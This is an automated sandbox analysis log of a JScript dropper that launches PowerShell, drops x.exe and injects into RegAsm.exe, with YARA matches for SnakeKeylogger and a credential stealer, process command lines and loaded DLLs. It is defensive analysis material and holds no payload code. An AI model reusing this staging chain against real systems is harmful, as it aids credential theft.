                Source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: powershell.exe PID: 7500, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: x.exe.1.drStatic PE information: section name: 6Fd:c#
                Source: x.exe.1.drStatic PE information: section name:
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00E528D03_2_00E528D0
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00E508483_2_00E50848
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00E511E03_2_00E511E0
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00E528C13_2_00E528C1
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00E508393_2_00E50839
                Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_00E507C03_2_00E507C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02AAC1685_2_02AAC168
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02AACA585_2_02AACA58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02AA7E685_2_02AA7E68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02AA4F085_2_02AA4F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02AAB9E05_2_02AAB9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02AA4EF85_2_02AA4EF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02AA7E595_2_02AA7E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02AA2DD15_2_02AA2DD1
                Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.x.exe.4564aa0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.x.exe.4536e58.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.x.exe.454dc80.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.x.exe.4564aa0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.x.exe.454dc80.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 3.2.x.exe.4536e58.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000005.00000002.2954889614.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000003.00000002.1818233805.00000000044C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 7500, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: x.exe PID: 7660, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegAsm.exe PID: 7704, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: x.exe.1.drStatic PE information: Section: 6Fd:c# ZLIB complexity 1.0003925398284315
                Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winJSE@10/7@4/4
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\jqxrkk[1].ps1Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                Source: C:\Windows\System32\wscript.exeFile created: C:\Temp\dddddd.ps1Jump to behavior
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegAsm.exe, 00000005.00000002.2956937742.0000000002DBE000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2956937742.0000000002DA0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: 1C24TDP_000000029.jseReversingLabs: Detection: 13%
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\1C24TDP_000000029.jse"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
